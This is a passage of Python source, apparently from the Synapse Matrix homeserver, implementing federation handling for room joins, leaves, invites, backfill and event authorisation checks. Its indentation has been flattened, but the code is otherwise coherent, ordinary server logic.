# This shouldn't happen, because the RoomMemberHandler has a
# linearizer lock which only allows one operation per user per room
# at a time - so this is just paranoia.
assert room_id not in self.room_queues
self.room_queues[room_id] = []
await self._clean_room_for_join(room_id)
handled_events = set()
try:
# Try the host we successfully got a response to /make_join/
# request first.
host_list = list(target_hosts)
try:
host_list.remove(origin)
host_list.insert(0, origin)
except ValueError:
pass
ret = await self.federation_client.send_join(
host_list, event, room_version_obj
)
origin = ret["origin"]
state = ret["state"]
auth_chain = ret["auth_chain"]
auth_chain.sort(key=lambda e: e.depth)
handled_events.update([s.event_id for s in state])
handled_events.update([a.event_id for a in auth_chain])
handled_events.add(event.event_id)
logger.debug("do_invite_join auth_chain: %s", auth_chain)
logger.debug("do_invite_join state: %s", state)
logger.debug("do_invite_join event: %s", event)
# if this is the first time we've joined this room, it's time to add
# a row to `rooms` with the correct room version. If there's already a
# row there, we should override it, since it may have been populated
# based on an invite request which lied about the room version.
#
# federation_client.send_join has already checked that the room
# version in the received create event is the same as room_version_obj,
# so we can rely on it now.
#
await self.store.upsert_room_on_join(
room_id=room_id, room_version=room_version_obj,
)
max_stream_id = await self._persist_auth_tree(
origin, room_id, auth_chain, state, event, room_version_obj
)
# We wait here until this instance has seen the events come down
# replication (if we're using replication) as the below uses caches.
await self._replication.wait_for_stream_position(
self.config.worker.events_shard_config.get_instance(room_id),
"events",
max_stream_id,
)
# Check whether this room is the result of an upgrade of a room we already know
# about. If so, migrate over user information
predecessor = await self.store.get_room_predecessor(room_id)
if not predecessor or not isinstance(predecessor.get("room_id"), str):
return event.event_id, max_stream_id
old_room_id = predecessor["room_id"]
logger.debug(
"Found predecessor for %s during remote join: %s", room_id, old_room_id
)
# We retrieve the room member handler here as to not cause a cyclic dependency
member_handler = self.hs.get_room_member_handler()
await member_handler.transfer_room_state_on_room_upgrade(
old_room_id, room_id
)
logger.debug("Finished joining %s to %s", joinee, room_id)
return event.event_id, max_stream_id
finally:
room_queue = self.room_queues[room_id]
del self.room_queues[room_id]
# we don't need to wait for the queued events to be processed -
# it's just a best-effort thing at this point. We do want to do
# them roughly in order, though, otherwise we'll end up making
# lots of requests for missing prev_events which we do actually
# have. Hence we fire off the background task, but don't wait for it.
run_in_background(self._handle_queued_pdus, room_queue)
async def _handle_queued_pdus(self, room_queue):
"""Process PDUs which got queued up while we were busy send_joining.
Args:
room_queue (list[FrozenEvent, str]): list of PDUs to be processed
and the servers that sent them
"""
for p, origin in room_queue:
try:
logger.info(
"Processing queued PDU %s which was received "
"while we were joining %s",
p.event_id,
p.room_id,
)
with nested_logging_context(p.event_id):
await self.on_receive_pdu(origin, p, sent_to_us_directly=True)
except Exception as e:
logger.warning(
"Error handling queued PDU %s from %s: %s", p.event_id, origin, e
)
async def on_make_join_request(
self, origin: str, room_id: str, user_id: str
) -> EventBase:
""" We've received a /make_join/ request, so we create a partial
join event for the room and return that. We do *not* persist or
process it until the other server has signed it and sent it back.
Args:
origin: The (verified) server name of the requesting server.
room_id: Room to create join event in
user_id: The user to create the join for
"""
if get_domain_from_id(user_id) != origin:
logger.info(
"Got /make_join request for user %r from different origin %s, ignoring",
user_id,
origin,
)
raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
# checking the room version will check that we've actually heard of the room
# (and return a 404 otherwise)
room_version = await self.store.get_room_version_id(room_id)
# now check that we are *still* in the room
is_in_room = await self.auth.check_host_in_room(room_id, self.server_name)
if not is_in_room:
logger.info(
"Got /make_join request for room %s we are no longer in", room_id,
)
raise NotFoundError("Not an active room on this server")
event_content = {"membership": Membership.JOIN}
builder = self.event_builder_factory.new(
room_version,
{
"type": EventTypes.Member,
"content": event_content,
"room_id": room_id,
"sender": user_id,
"state_key": user_id,
},
)
try:
event, context = await self.event_creation_handler.create_new_client_event(
builder=builder
)
except SynapseError as e:
logger.warning("Failed to create join to %s because %s", room_id, e)
raise
# The remote hasn't signed it yet, obviously. We'll do the full checks
# when we get the event back in `on_send_join_request`
await self.auth.check_from_context(
room_version, event, context, do_sig_check=False
)
return event
async def on_send_join_request(self, origin, pdu):
""" We have received a join event for a room. Fully process it and
respond with the current state and auth chains.
"""
event = pdu
logger.debug(
"on_send_join_request from %s: Got event: %s, signatures: %s",
origin,
event.event_id,
event.signatures,
)
if get_domain_from_id(event.sender) != origin:
logger.info(
"Got /send_join request for user %r from different origin %s",
event.sender,
origin,
)
raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
event.internal_metadata.outlier = False
# Send this event on behalf of the origin server.
#
# The reasons we have the destination server rather than the origin
# server send it are slightly mysterious: the origin server should have
# all the necessary state once it gets the response to the send_join,
# so it could send the event itself if it wanted to. It may be that
# doing it this way reduces failure modes, or avoids certain attacks
# where a new server selectively tells a subset of the federation that
# it has joined.
#
# The fact is that, as of the current writing, Synapse doesn't send out
# the join event over federation after joining, and changing it now
# would introduce the danger of backwards-compatibility problems.
event.internal_metadata.send_on_behalf_of = origin
context = await self._handle_new_event(origin, event)
logger.debug(
"on_send_join_request: After _handle_new_event: %s, sigs: %s",
event.event_id,
event.signatures,
)
prev_state_ids = await context.get_prev_state_ids()
state_ids = list(prev_state_ids.values())
auth_chain = await self.store.get_auth_chain(state_ids)
state = await self.store.get_events(list(prev_state_ids.values()))
return {"state": list(state.values()), "auth_chain": auth_chain}
async def on_invite_request(
self, origin: str, event: EventBase, room_version: RoomVersion
):
""" We've got an invite event. Process and persist it. Sign it.
Respond with the now signed event.
"""
if event.state_key is None:
raise SynapseError(400, "The invite event did not have a state key")
is_blocked = await self.store.is_room_blocked(event.room_id)
if is_blocked:
raise SynapseError(403, "This room has been blocked on this server")
if self.hs.config.block_non_admin_invites:
raise SynapseError(403, "This server does not accept room invites")
if not self.spam_checker.user_may_invite(
event.sender, event.state_key, event.room_id
):
raise SynapseError(
403, "This user is not permitted to send invites to this server/user"
)
membership = event.content.get("membership")
if event.type != EventTypes.Member or membership != Membership.INVITE:
raise SynapseError(400, "The event was not an m.room.member invite event")
sender_domain = get_domain_from_id(event.sender)
if sender_domain != origin:
raise SynapseError(
400, "The invite event was not from the server sending it"
)
if not self.is_mine_id(event.state_key):
raise SynapseError(400, "The invite event must be for this server")
# block any attempts to invite the server notices mxid
if event.state_key == self._server_notices_mxid:
raise SynapseError(HTTPStatus.FORBIDDEN, "Cannot invite this user")
# keep a record of the room version, if we don't yet know it.
# (this may get overwritten if we later get a different room version in a
# join dance).
await self._maybe_store_room_on_outlier_membership(
room_id=event.room_id, room_version=room_version
)
event.internal_metadata.outlier = True
event.internal_metadata.out_of_band_membership = True
event.signatures.update(
compute_event_signature(
room_version,
event.get_pdu_json(),
self.hs.hostname,
self.hs.signing_key,
)
)
context = await self.state_handler.compute_event_context(event)
await self.persist_events_and_notify(event.room_id, [(event, context)])
return event
async def do_remotely_reject_invite(
self, target_hosts: Iterable[str], room_id: str, user_id: str, content: JsonDict
) -> Tuple[EventBase, int]:
origin, event, room_version = await self._make_and_verify_event(
target_hosts, room_id, user_id, "leave", content=content
)
# Mark as outlier as we don't have any state for this event; we're not
# even in the room.
event.internal_metadata.outlier = True
event.internal_metadata.out_of_band_membership = True
# Try the host that we successfully called /make_leave/ on first for
# the /send_leave/ request.
host_list = list(target_hosts)
try:
host_list.remove(origin)
host_list.insert(0, origin)
except ValueError:
pass
await self.federation_client.send_leave(host_list, event)
context = await self.state_handler.compute_event_context(event)
stream_id = await self.persist_events_and_notify(
event.room_id, [(event, context)]
)
return event, stream_id
async def _make_and_verify_event(
self,
target_hosts: Iterable[str],
room_id: str,
user_id: str,
membership: str,
content: JsonDict = {},
params: Optional[Dict[str, Union[str, Iterable[str]]]] = None,
) -> Tuple[str, EventBase, RoomVersion]:
(
origin,
event,
room_version,
) = await self.federation_client.make_membership_event(
target_hosts, room_id, user_id, membership, content, params=params
)
logger.debug("Got response to make_%s: %s", membership, event)
# We should assert some things.
# FIXME: Do this in a nicer way
assert event.type == EventTypes.Member
assert event.user_id == user_id
assert event.state_key == user_id
assert event.room_id == room_id
return origin, event, room_version
async def on_make_leave_request(
self, origin: str, room_id: str, user_id: str
) -> EventBase:
""" We've received a /make_leave/ request, so we create a partial
leave event for the room and return that. We do *not* persist or
process it until the other server has signed it and sent it back.
Args:
origin: The (verified) server name of the requesting server.
room_id: Room to create leave event in
user_id: The user to create the leave for
"""
if get_domain_from_id(user_id) != origin:
logger.info(
"Got /make_leave request for user %r from different origin %s, ignoring",
user_id,
origin,
)
raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
room_version = await self.store.get_room_version_id(room_id)
builder = self.event_builder_factory.new(
room_version,
{
"type": EventTypes.Member,
"content": {"membership": Membership.LEAVE},
"room_id": room_id,
"sender": user_id,
"state_key": user_id,
},
)
event, context = await self.event_creation_handler.create_new_client_event(
builder=builder
)
try:
# The remote hasn't signed it yet, obviously. We'll do the full checks
# when we get the event back in `on_send_leave_request`
await self.auth.check_from_context(
room_version, event, context, do_sig_check=False
)
except AuthError as e:
logger.warning("Failed to create new leave %r because %s", event, e)
raise e
return event
async def on_send_leave_request(self, origin, pdu):
""" We have received a leave event for a room. Fully process it."""
event = pdu
logger.debug(
"on_send_leave_request: Got event: %s, signatures: %s",
event.event_id,
event.signatures,
)
if get_domain_from_id(event.sender) != origin:
logger.info(
"Got /send_leave request for user %r from different origin %s",
event.sender,
origin,
)
raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
event.internal_metadata.outlier = False
await self._handle_new_event(origin, event)
logger.debug(
"on_send_leave_request: After _handle_new_event: %s, sigs: %s",
event.event_id,
event.signatures,
)
return None
async def get_state_for_pdu(self, room_id: str, event_id: str) -> List[EventBase]:
"""Returns the state at the event. i.e. not including said event.
"""
event = await self.store.get_event(event_id, check_room_id=room_id)
state_groups = await self.state_store.get_state_groups(room_id, [event_id])
if state_groups:
_, state = list(state_groups.items()).pop()
results = {(e.type, e.state_key): e for e in state}
if event.is_state():
# Get previous state
if "replaces_state" in event.unsigned:
prev_id = event.unsigned["replaces_state"]
if prev_id != event.event_id:
prev_event = await self.store.get_event(prev_id)
results[(event.type, event.state_key)] = prev_event
else:
del results[(event.type, event.state_key)]
res = list(results.values())
return res
else:
return []
async def get_state_ids_for_pdu(self, room_id: str, event_id: str) -> List[str]:
"""Returns the state at the event. i.e. not including said event.
"""
event = await self.store.get_event(event_id, check_room_id=room_id)
state_groups = await self.state_store.get_state_groups_ids(room_id, [event_id])
if state_groups:
_, state = list(state_groups.items()).pop()
results = state
if event.is_state():
# Get previous state
if "replaces_state" in event.unsigned:
prev_id = event.unsigned["replaces_state"]
if prev_id != event.event_id:
results[(event.type, event.state_key)] = prev_id
else:
results.pop((event.type, event.state_key), None)
return list(results.values())
else:
return []
@log_function
async def on_backfill_request(
self, origin: str, room_id: str, pdu_list: List[str], limit: int
) -> List[EventBase]:
in_room = await self.auth.check_host_in_room(room_id, origin)
if not in_room:
raise AuthError(403, "Host not in room.")
# Synapse asks for 100 events per backfill request. Do not allow more.
limit = min(limit, 100)
events = await self.store.get_backfill_events(room_id, pdu_list, limit)
events = await filter_events_for_server(self.storage, origin, events)
return events
@log_function
async def get_persisted_pdu(
self, origin: str, event_id: str
) -> Optional[EventBase]:
"""Get an event from the database for the given server.
Args:
origin: hostname of server which is requesting the event; we
will check that the server is allowed to see it.
event_id: id of the event being requested
Returns:
None if we know nothing about the event; otherwise the (possibly-redacted) event.
Raises:
AuthError if the server is not currently in the room
"""
event = await self.store.get_event(
event_id, allow_none=True, allow_rejected=True
)
if event:
in_room = await self.auth.check_host_in_room(event.room_id, origin)
if not in_room:
raise AuthError(403, "Host not in room.")
events = await filter_events_for_server(self.storage, origin, [event])
event = events[0]
return event
else:
return None
async def get_min_depth_for_context(self, context):
return await self.store.get_min_depth(context)
async def _handle_new_event(
self, origin, event, state=None, auth_events=None, backfilled=False
):
context = await self._prep_event(
origin, event, state=state, auth_events=auth_events, backfilled=backfilled
)
try:
if (
not event.internal_metadata.is_outlier()
and not backfilled
and not context.rejected
):
await self.action_generator.handle_push_actions_for_event(
event, context
)
await self.persist_events_and_notify(
event.room_id, [(event, context)], backfilled=backfilled
)
except Exception:
run_in_background(
self.store.remove_push_actions_from_staging, event.event_id
)
raise
return context
async def _handle_new_events(
self,
origin: str,
room_id: str,
event_infos: Iterable[_NewEventInfo],
backfilled: bool = False,
) -> None:
"""Creates the appropriate contexts and persists events. The events
should not depend on one another, e.g. this should be used to persist
a bunch of outliers, but not a chunk of individual events that depend
on each other for state calculations.
Notifies about the events where appropriate.
"""
async def prep(ev_info: _NewEventInfo):
event = ev_info.event
with nested_logging_context(suffix=event.event_id):
res = await self._prep_event(
origin,
event,
state=ev_info.state,
auth_events=ev_info.auth_events,
backfilled=backfilled,
)
return res
contexts = await make_deferred_yieldable(
defer.gatherResults(
[run_in_background(prep, ev_info) for ev_info in event_infos],
consumeErrors=True,
)
)
await self.persist_events_and_notify(
room_id,
[
(ev_info.event, context)
for ev_info, context in zip(event_infos, contexts)
],
backfilled=backfilled,
)
async def _persist_auth_tree(
self,
origin: str,
room_id: str,
auth_events: List[EventBase],
state: List[EventBase],
event: EventBase,
room_version: RoomVersion,
) -> int:
"""Checks the auth chain is valid (and passes auth checks) for the
state and event. Then persists the auth chain and state atomically.
Persists the event separately. Notifies about the persisted events
where appropriate.
Will attempt to fetch missing auth events.
Args:
origin: Where the events came from
room_id,
auth_events
state
event
room_version: The room version we expect this room to have, and
will raise if it doesn't match the version in the create event.
"""
events_to_context = {}
for e in itertools.chain(auth_events, state):
e.internal_metadata.outlier = True
ctx = await self.state_handler.compute_event_context(e)
events_to_context[e.event_id] = ctx
event_map = {
e.event_id: e for e in itertools.chain(auth_events, state, [event])
}
create_event = None
for e in auth_events:
if (e.type, e.state_key) == (EventTypes.Create, ""):
create_event = e
break
if create_event is None:
# If the state doesn't have a create event then the room is
# invalid, and it would fail auth checks anyway.
raise SynapseError(400, "No create event in state")
room_version_id = create_event.content.get(
"room_version", RoomVersions.V1.identifier
)
if room_version.identifier != room_version_id:
raise SynapseError(400, "Room version mismatch")
missing_auth_events = set()
for e in itertools.chain(auth_events, state, [event]):
for e_id in e.auth_event_ids():
if e_id not in event_map:
missing_auth_events.add(e_id)
for e_id in missing_auth_events:
m_ev = await self.federation_client.get_pdu(
[origin], e_id, room_version=room_version, outlier=True, timeout=10000,
)
if m_ev and m_ev.event_id == e_id:
event_map[e_id] = m_ev
else:
logger.info("Failed to find auth event %r", e_id)
for e in itertools.chain(auth_events, state, [event]):
auth_for_e = {
(event_map[e_id].type, event_map[e_id].state_key): event_map[e_id]
for e_id in e.auth_event_ids()
if e_id in event_map
}
if create_event:
auth_for_e[(EventTypes.Create, "")] = create_event
try:
event_auth.check(room_version, e, auth_events=auth_for_e)
except SynapseError as err:
# we may get SynapseErrors here as well as AuthErrors. For
# instance, there are a couple of (ancient) events in some
# rooms whose senders do not have the correct sigil; these
# cause SynapseErrors in auth.check. We don't want to give up
# the attempt to federate altogether in such cases.
logger.warning("Rejecting %s because %s", e.event_id, err.msg)
if e == event:
raise
events_to_context[e.event_id].rejected = RejectedReason.AUTH_ERROR
await self.persist_events_and_notify(
room_id,
[
(e, events_to_context[e.event_id])
for e in itertools.chain(auth_events, state)
],
)
new_event_context = await self.state_handler.compute_event_context(
event, old_state=state
)
return await self.persist_events_and_notify(
room_id, [(event, new_event_context)]
)
async def _prep_event(
self,
origin: str,
event: EventBase,
state: Optional[Iterable[EventBase]],
auth_events: Optional[MutableStateMap[EventBase]],
backfilled: bool,
) -> EventContext:
context = await self.state_handler.compute_event_context(event, old_state=state)
if not auth_events:
prev_state_ids = await context.get_prev_state_ids()
auth_events_ids = self.auth.compute_auth_events(
event, prev_state_ids, for_verification=True
)
auth_events_x = await self.store.get_events(auth_events_ids)
auth_events = {(e.type, e.state_key): e for e in auth_events_x.values()}
# This is a hack to fix some old rooms where the initial join event
# didn't reference the create event in its auth events.
if event.type == EventTypes.Member and not event.auth_event_ids():
if len(event.prev_event_ids()) == 1 and event.depth < 5:
c = await self.store.get_event(
event.prev_event_ids()[0], allow_none=True
)
if c and c.type == EventTypes.Create:
auth_events[(c.type, c.state_key)] = c
context = await self.do_auth(origin, event, context, auth_events=auth_events)
if not context.rejected:
await self._check_for_soft_fail(event, state, backfilled)
if event.type == EventTypes.GuestAccess and not context.rejected:
await self.maybe_kick_guest_users(event)
return context
async def _check_for_soft_fail(
self, event: EventBase, state: Optional[Iterable[EventBase]], backfilled: bool
) -> None:
"""Checks if we should soft fail the event; if so, marks the event as
such.
Args:
event
state: The state at the event if we don't have all the event's prev events
backfilled: Whether the event is from backfill
"""
# For new (non-backfilled and non-outlier) events we check if the event
# passes auth based on the current state. If it doesn't then we
# "soft-fail" the event.
if backfilled or event.internal_metadata.is_outlier():
return
extrem_ids_list = await self.store.get_latest_event_ids_in_room(event.room_id)
extrem_ids = set(extrem_ids_list)
prev_event_ids = set(event.prev_event_ids())
if extrem_ids == prev_event_ids:
# If they're the same then the current state is the same as the
# state at the event, so no point rechecking auth for soft fail.
return
room_version = await self.store.get_room_version_id(event.room_id)
room_version_obj = KNOWN_ROOM_VERSIONS[room_version]
# Calculate the "current state".
if state is not None:
# If we're explicitly given the state then we won't have all the
# prev events, and so we have a gap in the graph. In this case
# we want to be a little careful as we might have been down for
# a while and have an incorrect view of the current state,
# however we still want to do checks as gaps are easy to
# maliciously manufacture.
#
# So we use a "current state" that is actually a state
# resolution across the current forward extremities and the
# given state at the event. This should correctly handle cases
# like bans, especially with state res v2.
state_sets_d = await self.state_store.get_state_groups(
event.room_id, extrem_ids
)
state_sets = list(state_sets_d.values()) # type: List[Iterable[EventBase]]
state_sets.append(state)
current_states = await self.state_handler.resolve_events(
room_version, state_sets, event
)
current_state_ids = {
k: e.event_id for k, e in current_states.items()
} # type: StateMap[str]
else:
current_state_ids = await self.state_handler.get_current_state_ids(
event.room_id, latest_event_ids=extrem_ids
)
logger.debug(
"Doing soft-fail check for %s: state %s", event.event_id, current_state_ids,
)
# Now check if event pass auth against said current state
auth_types = auth_types_for_event(event)
current_state_ids_list = [
e for k, e in current_state_ids.items() if k in auth_types
]
auth_events_map = await self.store.get_events(current_state_ids_list)
current_auth_events = {
(e.type, e.state_key): e for e in auth_events_map.values()
}
try:
event_auth.check(room_version_obj, event, auth_events=current_auth_events)
except AuthError as e:
logger.warning("Soft-failing %r because %s", event, e)
event.internal_metadata.soft_failed = True
async def on_query_auth(
self, origin, event_id, room_id, remote_auth_chain, rejects, missing
):
in_room = await self.auth.check_host_in_room(room_id, origin)
if not in_room:
raise AuthError(403, "Host not in room.")
event = await self.store.get_event(event_id, check_room_id=room_id)
# Just go through and process each event in `remote_auth_chain`. We
# don't want to fall into the trap of `missing` being wrong.
for e in remote_auth_chain:
try:
await self._handle_new_event(origin, e)
except AuthError:
pass
# Now get the current auth_chain for the event.
local_auth_chain = await self.store.get_auth_chain(
list(event.auth_event_ids()), include_given=True
)
# TODO: Check if we would now reject event_id. If so we need to tell
# everyone.
ret = await self.construct_auth_difference(local_auth_chain, remote_auth_chain)
logger.debug("on_query_auth returning: %s", ret)
return ret
async def on_get_missing_events(
self, origin, room_id, earliest_events, latest_events, limit
):
in_room = await self.auth.check_host_in_room(room_id, origin)
if not in_room:
raise AuthError(403, "Host not in room.")
# Only allow up to 20 events to be retrieved per request.
limit = min(limit, 20)
missing_events = await self.store.get_missing_events(
room_id=room_id,
earliest_events=earliest_events,
latest_events=latest_events,
limit=limit,
)
missing_events = await filter_events_for_server(
self.storage, origin, missing_events
)
return missing_events
async def do_auth(
self,
origin: str,
event: EventBase,
context: EventContext,
auth_events: MutableStateMap[EventBase],
) -> EventContext:
"""
Args:
origin:
event:
context:
auth_events:
Map from (event_type, state_key) to event
Normally, our calculated auth_events based on the state of the room
at the event's position in the DAG, though occasionally (eg if the
event is an outlier), may be the auth events claimed by the remote
server.
Also NB that this function adds entries to it.
Returns:
updated context object
"""
room_version = await self.store.get_room_version_id(event.room_id)
room_version_obj = KNOWN_ROOM_VERSIONS[room_version]
try:
context = await self._update_auth_events_and_context_for_auth(
origin, event, context, auth_events
)
except Exception:
# We don't really mind if the above fails, so lets not fail
# processing if it does. However, it really shouldn't fail so
# let's still log as an exception since we'll still want to fix
# any bugs.
logger.exception(
"Failed to double check auth events for %s with remote. "
"Ignoring failure and continuing processing of event.",
event.event_id,
)
try:
event_auth.check(room_version_obj, event, auth_events=auth_events)
except AuthError as e:
logger.warning("Failed auth resolution for %r because %s", event, e)
context.rejected = RejectedReason.AUTH_ERROR
return context
async def _update_auth_events_and_context_for_auth(
self,
origin: str,
event: EventBase,
context: EventContext,
auth_events: MutableStateMap[EventBase],
) -> EventContext:
"""Helper for do_auth. See there for docs.
Checks whether a given event has the expected auth events. If it
doesn't then we talk to the remote server to compare state to see if
we can come to a consensus (e.g. if one server missed some valid
state).
This attempts to resolve any potential divergence of state between
servers, but is not essential and so failures should not block further
processing of the event.
Args:
origin:
event:
context:
auth_events:
Map from (event_type, state_key) to event
Normally, our calculated auth_events based on the state of the room
at the event's position in the DAG, though occasionally (eg if the
event is an outlier), may be the auth events claimed by the remote
server.
Also NB that this function adds entries to it.
Returns:
updated context
"""
event_auth_events = set(event.auth_event_ids())
# missing_auth is the set of the event's auth_events which we don't yet have
# in auth_events.
missing_auth = event_auth_events.difference(
e.event_id for e in auth_events.values()
)
# if we have missing events, we need to fetch those events from somewhere.
#
# we start by checking if they are in the store, and then try calling /event_auth/.
if missing_auth:
have_events = await self.store.have_seen_events(missing_auth)
logger.debug("Events %s are in the store", have_events)
missing_auth.difference_update(have_events)
if missing_auth:
# If we don't have all the auth events, we need to get them.
logger.info("auth_events contains unknown events: %s", missing_auth)
try:
try:
remote_auth_chain = await self.federation_client.get_event_auth(
origin, event.room_id, event.event_id
)
except RequestSendFailed as e1:
# The other side isn't around or doesn't implement the
# endpoint, so lets just bail out.
logger.info("Failed to get event auth from remote: %s", e1)
return context
seen_remotes = await self.store.have_seen_events(
[e.event_id for e in remote_auth_chain]
)
for e in remote_auth_chain:
if e.event_id in seen_remotes:
continue
if e.event_id == event.event_id:
continue
try:
auth_ids = e.auth_event_ids()
auth = {
(e.type, e.state_key): e
for e in remote_auth_chain
if e.event_id in auth_ids or e.type == EventTypes.Create
}
e.internal_metadata.outlier = True
logger.debug(
"do_auth %s missing_auth: %s", event.event_id, e.event_id
)
await self._handle_new_event(origin, e, auth_events=auth)
if e.event_id in event_auth_events:
auth_events[(e.type, e.state_key)] = e
except AuthError:
pass
except Exception:
logger.exception("Failed to get auth chain")
if event.internal_metadata.is_outlier():
# XXX: given that, for an outlier, we'll be working with the
# event's *claimed* auth events rather than those we calculated:
# (a) is there any point in this test, since different_auth below will
# obviously be empty
# (b) alternatively, why don't we do it earlier?
logger.info("Skipping auth_event fetch for outlier")
return context
different_auth = event_auth_events.difference(
e.event_id for e in auth_events.values()
)
if not different_auth:
return context
logger.info(
"auth_events refers to events which are not in our calculated auth "
"chain: %s",
different_auth,
)
# XXX: currently this checks for redactions but I'm not convinced that is
# necessary?
different_events = await self.store.get_events_as_list(different_auth)
for d in different_events:
if d.room_id != event.room_id:
logger.warning(
"Event %s refers to auth_event %s which is in a different room",
event.event_id,
d.event_id,
)
# don't attempt to resolve the claimed auth events against our own
# in this case: just use our own auth events.
#
# XXX: should we reject the event in this case? It feels like we should,
# but then shouldn't we also do so if we've failed to fetch any of the
# auth events?
return context
# now we state-resolve between our own idea of the auth events, and the remote's
# idea of them.
local_state = auth_events.values()
remote_auth_events = dict(auth_events)
remote_auth_events.update({(d.type, d.state_key): d for d in different_events})
remote_state = remote_auth_events.values()
room_version = await self.store.get_room_version_id(event.room_id)
new_state = await self.state_handler.resolve_events(
room_version, (local_state, remote_state), event
)
logger.info(
"After state res: updating auth_events with new state %s",
{
(d.type, d.state_key): d.event_id
for d in new_state.values()
if auth_events.get((d.type, d.state_key)) != d
},
)
auth_events.update(new_state)
context = await self._update_context_for_auth_events(
event, context, auth_events
)
return context
async def _update_context_for_auth_events(
self, event: EventBase, context: EventContext, auth_events: StateMap[EventBase]
) -> EventContext:
"""Update the state_ids in an event context after auth event resolution,
storing the changes as a new state group.
Args:
event: The event we're handling the context for
context: initial event context
auth_events: Events to update in the event context.
Returns:
new event context
"""
# exclude the state key of the new event from the current_state in the context.
if event.is_state():
event_key = (event.type, event.state_key) # type: Optional[Tuple[str, str]]
else:
event_key = None
state_updates = {
k: a.event_id for k, a in auth_events.items() if k != event_key
}
current_state_ids = await context.get_current_state_ids()
current_state_ids = dict(current_state_ids) # type: ignore
current_state_ids.update(state_updates)
prev_state_ids = await context.get_prev_state_ids()
prev_state_ids = dict(prev_state_ids)
prev_state_ids.update({k: a.event_id for k, a in auth_events.items()})
# create a new state group as a delta from the existing one.
prev_group = context.state_group
state_group = await self.state_store.store_state_group(
event.event_id,
event.room_id,
prev_group=prev_group,
delta_ids=state_updates,
current_state_ids=current_state_ids,
)
return EventContext.with_state(
state_group=state_group,
state_group_before_event=context.state_group_before_event,
current_state_ids=current_state_ids,
prev_state_ids=prev_state_ids,
prev_group=prev_group,
delta_ids=state_updates,
)
async def construct_auth_difference(
self, local_auth: Iterable[EventBase], remote_auth: Iterable[EventBase]
) -> Dict:
""" Given a local and remote auth chain, find the differences. This
assumes that we have already processed all events in remote_auth
Params:
local_auth (list)
remote_auth (list)
Returns:
dict
"""
logger.debug("construct_auth_difference Start!")
# TODO: Make sure we are OK with local_auth or remote_auth having more
# auth events in them than strictly necessary.
def sort_fun(ev):
return ev.depth, ev.event_id
logger.debug("construct_auth_difference after sort_fun!")
# We find the differences by starting at the "bottom" of each list
# and iterating up on both lists. The lists are ordered by depth and
# then event_id, we iterate up both lists until we find the event ids
# don't match. Then we look at depth/event_id to see which side is
# missing that event, and iterate only up that list. Repeat.
remote_list = list(remote_auth)
remote_list.sort(key=sort_fun)
local_list = list(local_auth)
local_list.sort(key=sort_fun)
local_iter = iter(local_list)
remote_iter = iter(remote_list)
logger.debug("construct_auth_difference before get_next!")
def get_next(it, opt=None):
try:
return next(it)
except Exception:
return opt
current_local = get_next(local_iter)
current_remote = get_next(remote_iter)
logger.debug("construct_auth_difference before while")
missing_remotes = []
missing_locals = []
while current_local or current_remote:
if current_remote is None:
missing_locals.append(current_local)
current_local = get_next(local_iter)
continue
if current_local is None:
missing_remotes.append(current_remote)
current_remote = get_next(remote_iter)
continue
if current_local.event_id == current_remote.event_id:
current_local = get_next(local_iter)
current_remote = get_next(remote_iter)
continue
if current_local.depth < current_remote.depth:
missing_locals.append(current_local)
current_local = get_next(local_iter)
continue
if current_local.depth > current_remote.depth:
missing_remotes.append(current_remote)
current_remote = get_next(remote_iter)
continue
# They have the same depth, so we fall back to the event_id order
if current_local.event_id < current_remote.event_id:
missing_locals.append(current_local)
current_local = get_next(local_iter)
if current_local.event_id > current_remote.event_id:
missing_remotes.append(current_remote)
current_remote = get_next(remote_iter)
continue
logger.debug("construct_auth_difference after while")
# missing locals should be sent to the server
# We should find why we are missing remotes, as they will have been
# rejected.
# Remove events from missing_remotes if they are referencing a missing
# remote. We only care about the "root" rejected ones.
missing_remote_ids = [e.event_id for e in missing_remotes]
base_remote_rejected = list(missing_remotes)
for e in missing_remotes:
for e_id in e.auth_event_ids():
if e_id in missing_remote_ids:
try:
base_remote_rejected.remove(e)
except ValueError:
pass
reason_map = {}
for e in base_remote_rejected:
reason = await self.store.get_rejection_reason(e.event_id)
if reason is None:
# TODO: e is not in the current state, so we should
# construct some proof of that.
continue
reason_map[e.event_id] = reason
logger.debug("construct_auth_difference returning")
return {
"auth_chain": local_auth,
"rejects": {
e.event_id: {"reason": reason_map[e.event_id], "proof": None}
for e in base_remote_rejected
},
"missing": [e.event_id for e in missing_locals],
}
@log_function
async def exchange_third_party_invite(
self, sender_user_id, target_user_id, room_id, signed
):
third_party_invite = {"signed": signed}
event_dict = {
"type": EventTypes.Member,
"content": {
"membership": Membership.INVITE,
"third_party_invite": third_party_invite,
},
"room_id": room_id,
"sender": sender_user_id,
"state_key": target_user_id,
}
if await self.auth.check_host_in_room(room_id, self.hs.hostname):
room_version = await self.store.get_room_version_id(room_id)
builder = self.event_builder_factory.new(room_version, event_dict)
EventValidator().validate_builder(builder)
event, context = await self.event_creation_handler.create_new_client_event(
builder=builder
)
event, context = await self.add_display_name_to_third_party_invite(
room_version, event_dict, event, context
)
EventValidator().validate_new(event, self.config)
# We need to tell the transaction queue to send this out, even
# though the sender isn't a local user.
event.internal_metadata.send_on_behalf_of = self.hs.hostname
try:
await self.auth.check_from_context(room_version, event, context)
except AuthError as e:
logger.warning("Denying new third party invite %r because %s", event, e)
raise e
await self._check_signature(event, context)
# We retrieve the room member handler here as to not cause a cyclic dependency
member_handler = self.hs.get_room_member_handler()
await member_handler.send_membership_event(None, event, context)
else:
destinations = {x.split(":", 1)[-1] for x in (sender_user_id, room_id)}
await self.federation_client.forward_third_party_invite(
destinations, room_id, event_dict
)
async def on_exchange_third_party_invite_request(
self, event_dict: JsonDict
) -> None:
"""Handle an exchange_third_party_invite request from a remote server
The remote server will call this when it wants to turn a 3pid invite
into a normal m.room.member invite.
Args:
event_dict: Dictionary containing the event body.
"""
assert_params_in_dict(event_dict, ["room_id"])
room_version = await self.store.get_room_version_id(event_dict["room_id"])
# NB: event_dict has a particular specced format we might need to fudge
# if we change event formats too much.
builder = self.event_builder_factory.new(room_version, event_dict)
event, context = await self.event_creation_handler.create_new_client_event(
builder=builder
)
event, context = await self.add_display_name_to_third_party_invite(
room_version, event_dict, event, context
)
try:
await self.auth.check_from_context(room_version, event, context)
except AuthError as e:
logger.warning("Denying third party invite %r because %s", event, e)
raise e
await self._check_signature(event, context)
# We need to tell the transaction queue to send this out, even
